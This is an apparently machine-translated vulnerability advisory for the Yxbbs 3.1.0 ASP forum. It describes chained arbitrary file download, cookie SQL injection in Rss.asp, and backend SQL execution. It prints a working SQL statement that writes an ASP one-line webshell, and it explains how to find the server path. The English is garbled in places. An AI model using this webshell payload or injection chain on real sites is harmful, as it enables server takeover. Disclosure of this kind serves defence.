Yxbbs Forum system Ver 3.1.0 multiple vulnerabilities-vulnerability warning-the black bar safety net

ID MYHACK58:62201027423
Type myhack58
Reporter 佚名
Modified 2010-06-29T00:00:00


Yxbbs by the Y network developed a set of open source free Community Forum system program, using asp+Access SQL technical. Speed: the use of currently the more popular caching technology, which greatly accelerates the forum access speed Function: although the function can not be and dynamic network compared to, but we in order to the actual basis functions absolutely able to the General Forum needs Applicable areas: this forum using the operation is simple and convenient, more suitable for those without much experience of the forum for newcomers to use Volume: the forum size is only 387K, and includes 2 Plug-in, more suitable for small space, upload time will be greatly reduced Divided into FREE version and the registered version. ver 3.1.0 the presence of serious security issues with!

Test method: 1:any file download: the official test/Article/UploadPic/2010-6/2010629143739543.jpg


2:cookie injection point. The root directory of the file Rss. Asp BoardID variable does not take filtering measures, since there is the whole Station anti-injection File Protection default for the Request. cookies do not do protection, you can through cookies injection. 3:the backend can execute arbitrary sql statements. Need iis6 environment.

SELECT '<%execute request("a")%>' into [YX_admin] in 'D:\web 路径 \a.Asp;a.xls' 'excel 8.0;' from YX_admin

The implementation of this statement, you can get a webshell.

Get the absolute path method: the use of an arbitrary File Download vulnerability. Just download a forum file, the saved time will allow you to save such files. D__hosting_wwwroot_index. asp

d:\hosting\wwwroot\ 即为 绝对 路径... and Database default file is. asa suffixes, add an anti-download the code, leading to arbitrary File Download vulnerability to it is invalid. That is download not database. So, these 3 vulnerabilities, and is interlocking. The database which holds the background directory name, if the default background directory admin changed it, you can try using the injection vulnerability to run it.

Manufacturers patch: There is no